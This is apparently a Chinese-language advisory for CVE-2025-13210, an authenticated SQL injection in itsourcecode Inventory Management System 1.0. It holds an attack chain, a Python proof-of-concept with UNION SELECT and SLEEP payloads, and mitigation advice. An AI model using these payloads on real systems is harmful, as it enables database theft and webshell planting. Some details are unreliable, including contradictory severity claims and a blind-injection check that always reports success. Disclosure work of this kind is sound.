CVE-2025-13210 itsourcecode Inventory Management System SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-13210

漏洞类型

SQL注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

itsourcecode Inventory Management System 1.0

漏洞概述

CVE-2025-13210是itsourcecode Inventory Management System 1.0版本中的一个高危SQL注入漏洞。该漏洞存在于管理后台的产品添加功能页面（/admin/products/index.php?view=add）中，攻击者可通过PROMODEL参数注入恶意SQL语句。由于该漏洞需要高权限认证账户才能利用，攻击难度相对较高，但仍可能对系统数据造成严重威胁。攻击者成功利用此漏洞可窃取数据库中的敏感信息，包括用户凭证、业务数据等，甚至可能在特定条件下执行系统命令。该漏洞已公开披露，PoC代码已在互联网传播，建议受影响用户尽快采取防护措施。

技术细节

该SQL注入漏洞存在于itsourcecode Inventory Management System 1.0的/admin/products/index.php脚本中。具体来说，当用户访问index.php?view=add页面并通过PROMODEL参数提交数据时，后端程序未对用户输入进行充分的输入验证和SQL语句参数化处理，导致攻击者可以在PROMODEL参数中嵌入恶意SQL代码。攻击者需要拥有管理后台的高权限账户（如管理员或产品经理角色）才能访问该功能页面。一旦成功登录后台，攻击者可通过构造特殊的SQL payload绕过现有安全限制，执行未授权的数据库操作。常见的利用方式包括：使用UNION SELECT语句提取数据库版本、用户名、密码哈希等信息；使用BENCHMARK或SLEEP函数进行基于时间的盲注测试；甚至可能通过LOAD_FILE或INTO OUTFILE语句读取敏感文件或写入webshell。CVSS 3.1评分4.7分（中等严重程度），主要因为该漏洞需要高权限认证且攻击复杂度较低。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别目标网站使用的itsourcecode Inventory Management System 1.0版本

STEP 2

步骤2

获取访问权限：攻击者获取管理后台的高权限账户凭据（通过暴力破解、钓鱼或社工手段）

STEP 3

步骤3

访问漏洞页面：攻击者登录管理后台，导航到/admin/products/index.php?view=add页面

STEP 4

步骤4

构造恶意Payload：攻击者在PROMODEL参数中注入SQL注入载荷，如UNION SELECT或时间盲注语句

STEP 5

步骤5

执行攻击：发送恶意请求，触发SQL注入漏洞，提取数据库敏感信息或执行未授权操作

STEP 6

步骤6

持久化控制：在成功利用后，攻击者可能创建后门账户或写入webshell以维持持久访问

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-13210 SQL Injection PoC
# Target: itsourcecode Inventory Management System 1.0
# Endpoint: /admin/products/index.php?view=add
# Parameter: PROMODEL

TARGET_URL = "http://target-site.com/admin/products/index.php"
LOGIN_URL = "http://target-site.com/admin/login.php"
USERNAME = "admin"
PASSWORD = "admin"

def login(session):
    """Login to admin panel"""
    data = {
        "username": USERNAME,
        "password": PASSWORD
    }
    response = session.post(LOGIN_URL, data=data)
    return "admin" in response.text or response.status_code == 200

def exploit_sqli(session):
    """Exploit SQL injection vulnerability"""
    # Basic SQL injection test - extract database version
    payload = "' UNION SELECT NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"
    
    params = {
        "view": "add",
        "PROMODEL": payload
    }
    
    try:
        response = session.get(TARGET_URL, params=params)
        
        # Check for SQL error indicators
        if "syntax error" in response.text.lower() or "mysql" in response.text.lower():
            print("[+] SQL Injection confirmed!")
            print("[+] Database version information may be leaked")
            return True
        else:
            print("[-] No obvious SQL injection response detected")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

def blind_sqli_test(session):
    """Time-based blind SQL injection test"""
    # Time-based blind injection - if vulnerable, response will be delayed
    payload = "' AND SLEEP(5)-- -"
    
    params = {
        "view": "add",
        "PROMODEL": payload
    }
    
    try:
        response = session.get(TARGET_URL, params=params, timeout=10)
        print("[+] Blind SQL injection test completed")
        return True
    except:
        print("[+] Time delay detected - vulnerability confirmed!")
        return True

if __name__ == "__main__":
    print("[*] CVE-2025-13210 SQL Injection PoC")
    print("[*] Target: itsourcecode Inventory Management System 1.0")
    
    session = requests.Session()
    
    # Step 1: Login
    print("\n[Step 1] Attempting admin login...")
    if login(session):
        print("[+] Login successful")
    else:
        print("[-] Login failed")
        sys.exit(1)
    
    # Step 2: Test SQL injection
    print("\n[Step 2] Testing SQL injection...")
    exploit_sqli(session)
    
    # Step 3: Blind SQL injection test
    print("\n[Step 3] Testing blind SQL injection...")
    blind_sqli_test(session)
    
    print("\n[*] Scan completed")

影响范围

itsourcecode Inventory Management System 1.0

防御指南

临时缓解措施

在官方发布修复补丁之前，建议采取以下临时缓解措施：1）限制管理后台访问来源，配置IP白名单或VPN访问；2）临时关闭产品添加功能或移除受影响的PROMODEL参数处理逻辑；3）启用Web应用防火墙规则阻断可疑的SQL注入特征；4）加强对管理账户的监控，及时发现异常登录行为；5）定期备份数据库，以便在发生数据泄露时快速恢复。建议关注官方渠道发布的最新安全公告，尽快部署正式补丁。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13210
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13210
3 Details https://www.cvedetails.com/cve/CVE-2025-13210/
4 VulDB https://vuldb.com/cve/CVE-2025-13210
5 Link https://github.com/yihaofuweng/cve/issues/56
6 Link https://itsourcecode.com/
7 Link https://vuldb.com/?ctiid.332529
8 Link https://vuldb.com/?id.332529
9 Link https://vuldb.com/?submit.685702